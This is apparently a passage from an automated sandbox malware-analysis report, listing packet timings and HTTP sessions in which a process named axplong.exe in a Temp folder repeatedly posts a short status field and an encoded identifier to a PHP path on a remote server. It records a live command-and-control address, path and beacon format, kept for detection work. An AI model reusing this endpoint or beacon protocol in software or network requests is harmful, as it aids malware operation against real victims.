                    Sep 27, 2024 08:42:05.264228106 CEST5370980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:05.268948078 CEST8053709185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:05.987082958 CEST8053709185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:05.987144947 CEST5370980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.097784042 CEST5370980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.098367929 CEST5371080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.104599953 CEST8053709185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:06.104614973 CEST8053710185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:06.104650021 CEST5370980192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.104742050 CEST5371080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.104980946 CEST5371080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.111033916 CEST8053710185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:06.805308104 CEST8053710185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:06.805479050 CEST5371080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.809056044 CEST5371080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.809326887 CEST5371180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.814173937 CEST8053711185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:06.814186096 CEST8053710185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:06.814296007 CEST5371080192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.814444065 CEST5371180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.814843893 CEST5371180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:06.819570065 CEST8053711185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:07.518167019 CEST8053711185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:07.518294096 CEST5371180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:07.798810005 CEST5371180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:07.802313089 CEST5371280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:07.803926945 CEST8053711185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:07.804016113 CEST5371180192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:07.807127953 CEST8053712185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:07.807315111 CEST5371280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:07.809724092 CEST5371280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:07.814455986 CEST8053712185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:08.501472950 CEST8053712185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:08.501534939 CEST5371280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:08.607068062 CEST5371280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:08.608797073 CEST5371380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:08.612219095 CEST8053712185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:08.612330914 CEST5371280192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:08.613656998 CEST8053713185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:08.613765001 CEST5371380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:08.619116068 CEST5371380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:08.623900890 CEST8053713185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:09.326592922 CEST8053713185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:09.326668024 CEST5371380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:09.440871000 CEST5371380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:09.441369057 CEST5371480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:09.445888996 CEST8053713185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:09.445972919 CEST5371380192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:09.446178913 CEST8053714185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:09.446382999 CEST5371480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:09.446641922 CEST5371480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:09.451366901 CEST8053714185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:10.136900902 CEST8053714185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:10.137129068 CEST5371480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:10.141611099 CEST5371480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:10.141999006 CEST5371580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:10.146689892 CEST8053714185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:10.146769047 CEST8053715185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:10.149996042 CEST5371480192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:10.150015116 CEST5371580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:10.150201082 CEST5371580192.168.2.4185.215.113.16
                    Sep 27, 2024 08:42:10.154912949 CEST8053715185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:10.873265028 CEST8053715185.215.113.16192.168.2.4
                    Sep 27, 2024 08:42:10.873420000 CEST5371580192.168.2.4185.215.113.16
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 27, 2024 08:40:49.428585052 CEST5355946162.159.36.2192.168.2.4
                    Sep 27, 2024 08:40:49.934156895 CEST53497231.1.1.1192.168.2.4
                    • 185.215.113.16
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.453653185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:03.634221077 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:04.346273899 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:04.348231077 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:04.574336052 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.453654185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:04.693566084 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:05.390173912 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:05.395132065 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:05.621922016 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.453655185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:05.741049051 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:06.437556982 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:06.439991951 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:06.662950993 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.453656185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:06.772139072 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:07.471334934 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:07.478423119 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:07.706590891 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.453657185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:08.003845930 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:08.723110914 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:08.724097013 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:08.945633888 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.453658185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:09.052608967 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:09.846620083 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:09.847716093 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:10.082247019 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.453659185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:10.196779013 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:10.907996893 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:10.908673048 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:11.139823914 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.453660185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:11.268013954 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:11.947515011 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:11.950130939 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:12.172815084 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.453661185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:12.336788893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:13.045196056 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:13.046253920 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:13.273000002 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.453662185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:13.380831957 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:14.071178913 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:14.072191954 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
